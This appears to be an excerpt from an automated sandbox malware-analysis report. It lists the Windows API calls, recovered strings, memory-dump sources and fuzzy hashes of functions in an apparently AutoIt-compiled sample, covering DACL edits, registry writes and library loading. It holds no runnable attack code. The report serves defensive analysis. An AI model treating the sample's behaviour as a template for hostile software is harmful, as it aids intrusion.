                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00130DF5
                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00130E29
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130E40
                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00130E7A
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00130E96
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130EAD
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00130EB5
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00130EBC
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00130EDD
                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00130EE4
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00130F13
                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00130F35
                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00130F47
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F6E
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130F75
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F7E
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130F85
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130F8E
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130F95
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00130FA1
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130FA8
                                                                                                                                                                                                                                            • Part of subcall function 00131193: GetProcessHeap.KERNEL32(00000008,00130BB1,?,00000000,?,00130BB1,?), ref: 001311A1
                                                                                                                                                                                                                                            • Part of subcall function 00131193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00130BB1,?), ref: 001311A8
                                                                                                                                                                                                                                            • Part of subcall function 00131193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00130BB1,?), ref: 001311B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                          • Opcode ID: 7b0b63987c1abc5f4f71f23453dfa9e3750ec7cec7c783122cd62217ff69378d
                                                                                                                                                                                                                                          • Instruction ID: f21c798e9f7c98bc6ae504f08a9d917596e8623cea0418f3afd89086630ba414
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b0b63987c1abc5f4f71f23453dfa9e3750ec7cec7c783122cd62217ff69378d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43714B7290020AEBDF219FA4DC44BBEBBBCBF09710F144125F959A6191D7719A45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015C4BD
                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0016CC08,00000000,?,00000000,?,?), ref: 0015C544
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0015C5A4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015C5F4
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0015C66F
                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0015C6B2
                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0015C7C1
                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0015C84D
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0015C881
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0015C88E
                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0015C960
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                                                                                          • Opcode ID: 76cf692b48251fec2f5d8f31a8c84812b9f5ae736e571ae106999de513c4552e
                                                                                                                                                                                                                                          • Instruction ID: a41bb377b84efd053c6318057675feb0ce50b70f597168a6247e509e8a52845b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76cf692b48251fec2f5d8f31a8c84812b9f5ae736e571ae106999de513c4552e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14127435204701DFCB14DF24C881A6AB7E5EF88715F04889DF89A9B3A2DB71ED45CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 001609C6
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160A01
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00160A54
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160A8A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160B06
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00160B81
                                                                                                                                                                                                                                            • Part of subcall function 000EF9F2: _wcslen.LIBCMT ref: 000EF9FD
                                                                                                                                                                                                                                            • Part of subcall function 00132BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00132BFA
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                          • Opcode ID: d580fcaaa226c08fc42ef6ee18fe04c91319bfc255740189c45fa394baa823d4
                                                                                                                                                                                                                                          • Instruction ID: 0bd32a8a5dd85ff58524b3b9598a5677115893594a1076127dc6a74acf3ae7cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d580fcaaa226c08fc42ef6ee18fe04c91319bfc255740189c45fa394baa823d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE1DB352083018FCB15DF64C85096BB7E2BF98314F11895DF89AAB3A2D731ED55CB92
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0015C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                          • Opcode ID: 08a195922e33c9e9648af332ff47da3e90442206217a90afaadea4e37dfa3fcb
                                                                                                                                                                                                                                          • Instruction ID: dcb98f4c9ec5fbdbdd058456ae7b96e00e5bc9bd82afde7dfa246d064c0b997b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08a195922e33c9e9648af332ff47da3e90442206217a90afaadea4e37dfa3fcb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C71B03261426ACFCF20DE68C9515FA3791AFA1795B150528EC76AF285F771CD48C3E0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0016833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0016835A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0016836E
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00168391
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001683B4
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001683F2
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00165BF2), ref: 0016844E
                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00168487
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001684CA
                                                                                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00168501
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 0016850D
                                                                                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0016851D
                                                                                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00165BF2), ref: 0016852C
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00168549
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00168555
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                          • Opcode ID: acdcd1b9b8905ee98649441b514f9c78ac97aa3f9531373d9d7bc2c0a974aead
                                                                                                                                                                                                                                          • Instruction ID: 846df9f5689748d8f5dbdac9530168bec312d714bf374affcc798893650ddd01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdcd1b9b8905ee98649441b514f9c78ac97aa3f9531373d9d7bc2c0a974aead
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0261CF71640219BAEB14DF64CC81BFF77A8BF08711F10460AF956D61D1DFB4AAA0DBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000D7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                          • API String ID: 0-1645009161
                                                                                                                                                                                                                                          • Opcode ID: cfa31b67087eb30304cf0ebd1d5262670aa81f7ff229121923df158bb95d6e9b
                                                                                                                                                                                                                                          • Instruction ID: 54797378bd51968d1c3d56727744ebc7bcfd5c8e73b298ea1b4b9046aee6a528
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa31b67087eb30304cf0ebd1d5262670aa81f7ff229121923df158bb95d6e9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB81F171644305BBDB25AF60DC42FFE37A9AF55300F004426F909AA293FBB0DA51D7A1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00143E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00143EF8
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00143F03
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00143F5A
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00143F98
                                                                                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00143FD6
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0014401E
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00144059
                                                                                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00144087
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                          • Opcode ID: be860a3d6856080776301413e239c4158987096353b439251698540dcbd99d79
                                                                                                                                                                                                                                          • Instruction ID: c8f588907ba5d1f86ad13777cb591e816348bcd6f0e5ef86f08bdec05655b8e3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be860a3d6856080776301413e239c4158987096353b439251698540dcbd99d79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B71C4716043019FC710DF24C8819AAB7F4EF94754F50492DF9A697262EB31DD49CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00135A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00135A2E
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00135A40
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00135A57
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00135A6C
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00135A72
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00135A82
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00135A88
                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00135AA9
                                                                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00135AC3
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00135ACC
                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00135B33
                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00135B6F
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00135B75
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00135B7C
                                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00135BD3
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00135BE0
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00135C05
                                                                                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00135C2F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                                                                                          • Opcode ID: 95c6369e1c6ac2ec4e14bf7f1344c8cf2c31002f7202a2eb3cf3bce2ccb5303a
                                                                                                                                                                                                                                          • Instruction ID: 76abe96af2bd96ad260c8ff8cb4645e1a6bff2df9386bc027a371c944cd00dc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c6369e1c6ac2ec4e14bf7f1344c8cf2c31002f7202a2eb3cf3bce2ccb5303a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B715031900B05AFDB20DFA8CE45BAEBBF6FF48B05F104518E582A35A4D775E944CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014FE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 0014FE27
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 0014FE32
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0014FE3D
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 0014FE48
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0014FE53
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 0014FE5E
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 0014FE69
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0014FE74
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 0014FE7F
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 0014FE8A
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0014FE95
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0014FEA0
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 0014FEAB
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 0014FEB6
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0014FEC1
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 0014FECC
                                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 0014FEDC
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0014FF1E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                                                                                          • Opcode ID: 3a33cb9c919443364cb1c184fdfbb5b99b959172a18bb86a293e6d13f2dded23
                                                                                                                                                                                                                                          • Instruction ID: 27d3fdccd09d4372d182bf238fc738e0e047ee0dbe83617cfa3490a8e8328059
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a33cb9c919443364cb1c184fdfbb5b99b959172a18bb86a293e6d13f2dded23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C54131B1D043196BDB109FBA8C8986EBFE8FF04754B50452AE11DE7291DB78A901CE91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

